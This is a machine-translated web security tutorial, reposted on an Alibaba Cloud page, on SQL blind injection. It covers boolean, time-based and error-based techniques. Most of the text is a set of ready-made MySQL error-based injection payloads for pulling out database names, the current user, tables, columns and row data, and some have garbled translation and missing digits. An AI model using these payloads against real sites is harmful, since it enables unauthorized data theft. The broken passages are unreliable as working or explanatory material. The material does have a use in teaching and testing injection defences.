The fourth chapter of Web Security--About SQL Blinds

Source: Internet
Author: User
Tags rand sql injection

One, SQL Blind Note:

Cannot see the echo, cannot from return directly reads to the database content the data The Guess solution, belongs to the blind note.

Second, the first kind-based on the Boolean type of blind Note:

This is very simple, the most typical example is to dig SQL injection when used:

1 " " 2 http://www.localhost.com/sqlinjection?id=1 '%20and%20 ' 1 ' = ' 1 3 http://www.localhost.com/sqlinjection?id=1 '%20and%20 ' 1 ' = ' 2 4 " "

In combat. Before a judgment is ever true, splice a judgment, for example "substring (Database (),") = ' A ' "

1 """ 2 such as id=1, there is a normal echo 3 Then: 4 id = 1 and substring (database (), +) = ' A ' 5 if the back is right, there is a return, no, no, so one burst out 6 """

Third, the second kind-based on the time type of blind note:

1 """ 2 SELECT * FROM tablename where id= ' 103 ' and if (substring (database (),) = ' A ', sleep (5), null) '; 3 """

Here if the first character is successfully guessed, it will sleep 5s otherwise "if (EXPR1,RESULT1,RESULT2) #如果expr1成立 result1 otherwise result2"

Please refer to the above two details:

Web security fourth-intimate access to databases: SQL injection attacks

Iv. the third type-Special error injection (the focus of this session):

0, the error here refers to

1, floor Error

(1) Formula:

1 """ 2 id=2 ' and (select 1 from (SELECT COUNT (*), concat ((rand (0)), (select (Core statement) from Information_schema.tables Lim it 0,1)) x from Information_schema.tables Group by x)--+3 ""

(2) Principle:

Cite a blog from Reber https://www.jianshu.com/p/8c2343705100

1 """2 Floor () is taken as an integer3 rand () generates a random number between 0 and 14 rand (0) * * will take 0 to 2 random numbers5 Floor (rand () * *) There are two records will be error6 Floor (rand (0) * *) records need to be more than 3, and more than 3 will be error, the return value is regular7 COUNT (*) is used to count results, which is equivalent to refreshing a result8 Group by in grouping the data will first look at the virtual table there is no such value, no words to insert, the existence of the word count (*) plus 19 when using group BY, the Floor (rand (0) * *) is executed once, and if no record exists for the virtual table, it is executed again when the virtual table is inserted, resulting in duplicate-and-error presence in the primary keyTen """

V. payload--> the statement of the blasting data:

1. Database Information

# database Count' and (select 1 from (Select+count (*), concat (select (Select (Select+concat (0x7e7e3a7e7e, COUNT ( Distinct table_schema), 0x7e7e3a7e7e) from Information_schema.tables) (Information_schema.tables limit 0,1), floor (rand (0) *)) X from Information_schema.tables Group by X) a)--+#database name' and (select 1 from (SELECT COUNT (*), Concat ((select (SELECT DISTINCT concat (0x7e7e3a7e7e, Table_schema, 0x7e7e3a7e7e) from Information_ Schema.tables limit%d,1)) from Information_schema.tables limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by X) a)--+

2. Current DB information

1 # Current-database-name 2 ' +and (Select/**/1/**/from (Select/**/count (*), concat (select/**/(select/**/(Select/**/concat (0x7e7e3a7e7e,/* */(Select/**/database ()),/**/0x7e7e3a7e7e))) (/**/from/**/information_schema.tables/**/limit/**/0,1), Floor (rand ( 0))) x/**/from/**/information_schema.tables/**/group/**/by/**/x)--+3#Current 

3. Current User Information

1 # Current USER 2 ' +and (Select/**/1/**/from (Select/**/count (*), concat (select/**/(select/**/(Select/**/concat (0x7e7e3a7e7e,/* */(Select/**/user ()),/**/0x7e7e3a7e7e))) (/**/from/**/information_schema.tables/**/limit/**/0,1), Floor (rand (0) * * )) x/**/from/**/information_schema.tables/**/group/**/by/**/x) a)--+3# Current

4. Table information

1 #Table Count2 '+and (Select/**/1/**/from (Select/**/count (*), concat (select/**/(select/**/(/**/select/**/concat ( 0x7e7e3a7e7e,/**/count (table_name),/**/0x7e7e3a7e7e)/**/from/**/information_schema.tables/**/where/**/table_ schema=%s)) (/**/from/**/information_schema.tables/**/limit/**/0,1), Floor (rand (0))) X/**/from/**/information_ schema.tables/**/group/**/by/**/x) a)--+3 #Table name4 '+and (Select/**/1/**/from (Select/**/count (*), concat (select/**/(select/**/(/**/select/**/concat ( 0X7E7E3A7E7E,/**/TABLE_NAME,/**/0X7E7E3A7E7E)/**/from/**/information_schema.tables/**/where/**/table_schema=%s /**/limit/**/%d,1)) (/**/from/**/information_schema.tables/**/limit/**/0,1), Floor (rand (0))) x/**/from/**/ information_schema.tables/**/group/**/by/**/x) a)--+

5. Column information

1 #column num2 '+and (select 1 from (SELECT COUNT (*), concat (SELECT (Select Concat (0x7e7e3a7e7e,count (column_name), 0x7e7e3a7e7e) from Information_schema.columns where table_name=%s and table_schema=%s)) from Information_schema.tables Limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by X) a)--+3 #Column Name4 '+and (select 1 from (SELECT COUNT (*), concat (SELECT (select Concat (0x7e7e3a7e7e,column_name,0x7e7e3a7e7e) From Information_schema.columns where table_name=%s and table_schema=%s limit%d,1)) from Information_schema.tables Limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by X) a)--+

6. Data

1 # Data 2 ' +and (select 1 from (SELECT COUNT (*), concat (SELECT (Select (select Concat (%s) from%s.%s limit%d,1) from information _schema.tables limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by X) a)--+

7. Supplement: Only valid for 32-bit:

id=2 and Updatexml (1,concat (0x7e, (SELECT @ @version), 0x7e), 1)--+
Id=1 and Extractvalue (1, concat (0x7e, (select @ @version), 0x7e))--+

Vi. Reference Documents:

http://wyb0.com/posts/injection-of-error-based/

The fourth chapter of Web Security--About SQL Blinds

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.